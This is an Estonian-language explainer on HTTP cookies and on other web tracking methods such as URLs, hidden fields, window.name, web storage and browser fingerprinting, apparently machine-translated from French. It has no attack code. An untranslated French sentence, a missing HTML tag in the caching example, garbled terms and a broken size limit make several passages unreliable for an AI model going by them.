Küpsiste alistamise meetodi puhul kasutab ründaja brauseri tõrget, et saata serverisse kehtetu küpsis.

Kuid enamik veebisaite salvestab küpsisesse endasse ainult seansi ID – juhuslikult genereeritud kordumatu numbri, mida kasutatakse seansi kasutaja tuvastamiseks, samas kui kogu muu teave salvestatakse serverisse. Sel juhul on see probleem suures osas lahendatud.

Küpsiste töötlemine veebisaitide vahel

Igal saidil eeldatakse oma küpsiseid, seega ei tohiks üks sait olla võimeline teise saidiga seotud küpsiseid muutma ega looma. Veebibrauseri turvaviga võib lubada pahatahtlikel saitidel seda reeglit rikkuda. Sellise vea ärakasutamist nimetatakse tavaliselt saidiülene toiduvalmistamine. Selliste rünnete eesmärk võib olla seansi ID vargus.

Kasutajad peaksid kasutama veebibrauserite uusimaid versioone, milles need haavatavused on praktiliselt kõrvaldatud.

Konflikt olek kliendi ja serveri vahel

Küpsiste kasutamine võib tekitada vastuolu kliendi oleku ja küpsisesse salvestatud oleku vahel. Kui kasutaja omandab küpsise ja klõpsab brauseri nupul "Tagasi", ei ole brauseri olek üldiselt sama, mis enne seda omandamist. Näiteks kui veebipoe korv luuakse küpsiste abil, ei saa ostukorvi sisu muutuda, kui kasutaja naaseb veebilehitseja ajalukku: kui kasutaja vajutab nuppu artikli lisamiseks oma ostukorvi ja klõpsab nupul „Tagasi " nuppu, jääb artikkel sellesse. See ei pruugi olla kasutaja eesmärk, kes soovib kindlasti artikli lisamise tühistada. See võib põhjustada ebausaldusväärsust, segadust ja vigu. Seega peaksid veebiarendajad sellest probleemist teadlikud olema ja rakendama meetmeid selliste olukordade lahendamiseks.

Küpsise aegumine

Privaatsusturbeeksperdid on kritiseerinud püsivaid küpsiseid, kuna need ei aegu piisavalt kiiresti, võimaldades seeläbi veebisaitidel kasutajaid jälgida ja aja jooksul oma profiili luua. See küpsiste aspekt on samuti osa seansi kaaperdamise probleemist, kuna varastatud püsivat küpsist saab kasutada kasutajana esinemiseks pikka aega.

Loe ka: GAFAM: kes nad on? Miks nad (mõnikord) nii hirmutavad on?

Alternatiivid küpsistele

Mõningaid toiminguid, mida saab teha küpsiste abil, saab teha ka muude mehhanismidega, mis lähevad küpsistest mööda või loovad uuesti kustutatud küpsised, mis tekitab privaatsusprobleeme samal viisil (või mõnikord veelgi hullemini, sest siis nähtamatud) kui küpsised.

IP-aadress

Kasutajaid saab jälgida lehele helistava arvuti IP-aadressi järgi. See tehnika on olnud saadaval alates World Wide Webi kasutuselevõtust, kuna lehtede allalaadimisel küsib server brauserit või puhverserverit kasutava arvuti IP-aadressi, kui seda ei kasutata. Server saab seda teavet jälgida olenemata sellest, kas küpsiseid kasutatakse või mitte. Kuid need aadressid on kasutaja tuvastamisel tavaliselt vähem usaldusväärsed kui küpsised, kuna arvuteid ja puhverservereid võivad jagada mitmed kasutajad ning sama arvuti võib igal tööseansil saada erineva IP-aadressi (nt telefoniühenduste puhul sageli). .

IP-aadresside järgi jälgimine võib teatud olukordades olla usaldusväärne, näiteks lairibaühendused, mis säilitavad sama IP-aadressi pikka aega, kuni toide on sisse lülitatud.

Mõned süsteemid, nagu Tor, on loodud selleks, et säilitada Interneti anonüümsus ja muuta IP-aadressi järgi jälgimine võimatuks või ebapraktiliseks.

URL

Täpsem tehnika põhineb teabe manustamisel URL-idesse. URL-i päringustringi osa on üks tehnika, mida tavaliselt selleks otstarbeks kasutatakse, kuid kasutada saab ka teisi osi. Nii Java serverlet kui ka PHP seansi mehhanismid kasutavad seda meetodit, kui küpsised pole lubatud.

See meetod hõlmab seda, et veebiserver lisab seda brauserisse saatmisel selle veebilehe linkidele stringipäringuid. Kui kasutaja järgib linki, tagastab brauser serverile lisatud päringustringi.

Sel eesmärgil kasutatavad päringustringid ja küpsised on väga sarnased, olles mõlemad serveri poolt meelevaldselt valitud ja brauseri tagastatud teave. Siiski on mõned erinevused: kui päringustringi sisaldavat URL-i uuesti kasutatakse, saadetakse sama teave serverisse. Näiteks kui kasutaja eelistused on kodeeritud URL-i päringustringis ja kasutaja saadab selle URL-i teisele kasutajale meili teel, saab ka see kasutaja neid eelistusi kasutada.

Teisest küljest, kui kasutaja siseneb samale lehele kaks korda, ei ole garanteeritud, et mõlemal korral kasutatakse sama päringutringi. Näiteks kui kasutaja satub esimest korda saidi siselehe lehele ja teisel korral samale lehele väliselt lehelt, on päringustring saidi lehe suhtes tavaliselt erinev, samas kui küpsised on samad. .

Päringustringide muud puudused on seotud turvalisusega: seanssi identifitseerivate andmete hoidmine päringustringides võimaldab või lihtsustab seansi fikseerimise ründeid, identifikaatori viiterünnakuid ja muid ärakasutusi. Seansi ID-de edastamine HTTP-küpsisena on turvalisem.

Varjatud vormiväli

Üks seansi jälgimise vorme, mida ASP.NET kasutab, on peidetud väljadega veebivormide kasutamine. See meetod on väga sarnane URL-i päringustringide kasutamisele teabe edastamiseks ning sellel on samad eelised ja puudused; ja kui vormi töödeldakse HTTP GET meetodiga, muutuvad väljad tegelikult vormi esitamisel selle saadava brauseri URL-i osaks. Kuid enamikku vorme töödeldakse HTTP POST-iga, mis põhjustab vormiteabe, sealhulgas peidetud väljade, lisamise täiendava sisestusena, mis ei ole osa URL-ist ega küpsisest.

Sellel lähenemisviisil on jälgimise seisukohast kaks eelist: esiteks võimaldab HTML-i lähtekoodi ja POST-sisendisse paigutatud teabe jälgimine URL-i asemel tavakasutajal seda jälgimist vältida; teiseks ei kopeerita seansi teavet, kui kasutaja URL-i kopeerib (näiteks lehe kettale salvestamiseks või meili teel saatmiseks).

aken.nimi

Kõik tavalised veebibrauserid suudavad DOM-i window.name atribuuti kasutades JavaScripti kaudu salvestada üsna suure hulga andmeid (2MB kuni 32MB). Neid andmeid saab kasutada seansiküpsiste asemel ja neid kasutatakse ka erinevates domeenides. Seda tehnikat saab siduda JSON-objektidega, et salvestada keerukas kliendipoolsete seansimuutujate komplekt.

Negatiivne külg on see, et igal eraldi aknal või vahekaardil on alguses tühi aken.nimi; vahelehtede (kasutaja poolt avatud) järgi sirvides tähendab see, et eraldi avatud vahelehtedel ei ole akna nime. Lisaks saab windows.name'i kasutada erinevate saitide külastajate jälgimiseks, mis võib tekitada privaatsusprobleeme.

Mõnes mõttes võib see serveri mittekaasamise tõttu olla küpsistest turvalisem, muutes selle seega haavamatuks nuusutavate küpsiste võrgurünnakute suhtes. Kui aga andmete kaitsmiseks rakendatakse erimeetmeid, on see haavatav edasiste rünnakute suhtes, kuna andmed on kättesaadavad teiste samas aknas avatud saitide kaudu.

HTTP autentimine

HTTP-protokoll sisaldab põhilisi juurdepääsu autentimise protokolle ja juurdepääsu autentimise kokkuvõtet, mis võimaldab juurdepääsu veebilehele ainult siis, kui kasutaja on andnud kasutajanime ja parooli. Kui server taotleb veebilehele juurdepääsu andmiseks sertifikaati, taotleb brauser seda kasutajalt ja kui see on kätte saadud, salvestab brauser selle ja saadab selle kõigis järgnevates HTTP-päringutes. Seda teavet saab kasutada kasutaja jälgimiseks.

Kohalik jagatud objekt

Kui brauseris on Adobe Flash Playeri pistikprogramm, kohalikud jagatud objektid saab kasutada samal eesmärgil kui küpsiseid. Need võivad olla veebiarendajatele atraktiivne valik, kuna:

• kohaliku jagatud objekti suuruse vaikepiirang on 100 KB;
• turvakontrollid on kasutaja küpsiste kontrollidest eraldiseisvad (nii saab lubada kohalikud jagatud objektid, kui küpsised pole).

See viimane punkt, mis eristab küpsiste halduspoliitikat Adobe kohalike jagatud objektide omast tekitab küsimusi mis puudutab tema privaatsusseadete haldamist kasutaja poolt: ta peab olema teadlik, et tema küpsiste haldamine ei mõjuta kohalike jagatud objektide haldamist ja vastupidi.

Teine kriitika selle süsteemi kohta on see, et seda saab kasutada ainult Adobe Flash Playeri pistikprogrammi kaudu, mis on patenteeritud, mitte veebistandard.

Kliendipoolne püsivus

Mõned veebibrauserid toetavad skriptipõhist püsivusmehhanismi, mis võimaldab lehel salvestada teavet kohalikult hilisemaks kasutamiseks. Näiteks Internet Explorer toetab püsivat teavet brauseri ajaloos, järjehoidjaid, XML-i salvestatud vormingus või otse kettale salvestatud veebilehega. Microsoft Internet Explorer 5 jaoks on DHTML-i käitumise kaudu saadaval kasutajaandmete meetod.

W3C võttis HTML 5-s kasutusele uue JavaScripti API kliendipoolse andmete salvestamiseks, mida nimetatakse veebisalvestuseks ja mille eesmärk oli küpsised jäädavalt asendada. See sarnaneb küpsistega, kuid oluliselt suurema võimsusega ja ilma HTTP-päringute päises teavet salvestamata. API võimaldab kahte tüüpi veebisalvestust: kohalikku salvestusruumi ja seansisalvestust, sarnaselt püsiküpsistele ja seansiküpsistele (välja arvatud see, et seansiküpsised aeguvad, kui brauser suletakse seansisalvestus aeguvad, kui vahekaart suletakse), vastavalt. Veebisalvestusruumi toetavad Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 ja Opera 10.50.

Erinev mehhanism põhineb tavaliselt brauseri vahemällu salvestamisel (pigem mälus kui värskendamisel), kasutades veebilehtedel JavaScripti programme. 

Näiteks võib leht sisaldada märgendit . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Sel hetkel jääb programm vahemällu ja külastatud lehte teist korda uuesti ei laadita. Järelikult, kui programm sisaldab globaalset muutujat (näiteks var id = 3243242;), jääb see identifikaator kehtima ja seda saab kasutada muu JavaScripti koodiga, kui leht laaditakse uuesti või kui programmi linkiv leht on laaditud. 

Selle meetodi peamine puudus on see, et JavaScripti globaalne muutuja peab olema staatiline, mis tähendab, et seda ei saa muuta ega kustutada nagu küpsist.

veebibrauseri sõrmejälg

Brauseri sõrmejälg on teave, mida kogutakse brauseri konfiguratsiooniseadete kohta tuvastamise eesmärgil. Neid sõrmejälgi saab kasutada Interneti-kasutaja või seadme täielikuks või osaliseks tuvastamiseks isegi siis, kui küpsised on keelatud.

Veebisaidi vaatajaskonna teenused on juba pikka aega kogunud põhilist veebibrauseri konfiguratsiooniteavet inimeste veebiliikluse täpseks mõõtmiseks ja erinevate klikipettuste tuvastamiseks. Kliendipoolsete skriptikeelte abil on teabe kogumine palju täpsem nüüd võimalik.

Selle teabe teisendamine bitistringiks loob seadme sõrmejälje. 2010. aastal mõõtis Electronic Frontier Foundation (EFF) brauseri sõrmejälje entroopia väärtuseks vähemalt 18,1 bitti, ja see oli enne seda, kui lõuendi sõrmejälgede võtmise edusammud lisasid sellele entroopiale 5,7 bitti.

Küpsised lühidalt

Küpsised on väikesed tekstifailid, mille veebibrauser salvestab veebisaidi külastaja kõvakettale ja mida kasutatakse (muuhulgas) teabe salvestamiseks külastaja või tema teekonna kohta saidil. Veebihaldur saab seega ära tunda külastaja harjumused ja kohandada oma saidi esitlust iga külastaja jaoks; küpsised võimaldavad siis meeles pidada, kui palju artikleid avalehel kuvada või isegi säilitada iga erapoole sisselogimismandaadid: kui külastaja naaseb saidile, ei pea ta enam oma nime ja parooli sisestama. ära tunda, kuna need loetakse automaatselt küpsisest.

Küpsisel on saidi kujundaja määratud piiratud kasutusiga. Need võivad aeguda ka saidi seansi lõpus, mis vastab brauseri sulgemisele. Küpsiseid kasutatakse laialdaselt, et muuta külastajate elu lihtsamaks ja esitada neile asjakohasemat teavet. Kuid spetsiaalsed tehnikad võimaldavad jälgida külastajat mitmel saidil ning seeläbi koguda ja ristkontrollida väga ulatuslikku teavet tema harjumuste kohta. See meetod on andnud küpsiste kasutamisele külastajate privaatsust rikkuva jälgimistehnika maine, mis kahjuks vastab tegelikkusele paljudel juhtudel, kui kasutatakse mittetehnilistel põhjustel või kasutajate ootusi mitte austades.

Vastuseks nendele õigustatud hirmudele tutvustab HTML 5 kliendipoolse andmesalvestuse jaoks uut JavaScripti API-d, mida nimetatakse veebisalvestuseks, mis on palju turvalisem ja suurema mahutavusega ning mille eesmärk on asendada küpsised.

Küpsiste säilitamine

Mõne brauseriga on küpsist lihtne redigeerida, selle väärtuste käsitsi muutmiseks piisab lihtsast tekstiredaktorist nagu Notepad.

Küpsiseid salvestatakse sõltuvalt brauserist erinevalt:

• Microsoft Internet Explorer salvestab iga küpsise erinevasse faili;
• Mozilla Firefox salvestab kõik oma küpsised ühte faili;
• Opera salvestab kõik oma küpsised ühte faili ja krüpteerib need (neid pole võimalik muuta, välja arvatud tarkvara valikutes);
• Apple Safari salvestab kõik oma küpsised ühte .plist laiendiga faili. Muutmine on võimalik, kuid mitte väga lihtne, kui just tarkvaravalikuid läbi ei lähe.

Toetamiseks on vaja brausereid miinimum :

• 300 samaaegset küpsist;
• 4 o küpsise kohta;
• 20 küpsist hosti või domeeni kohta.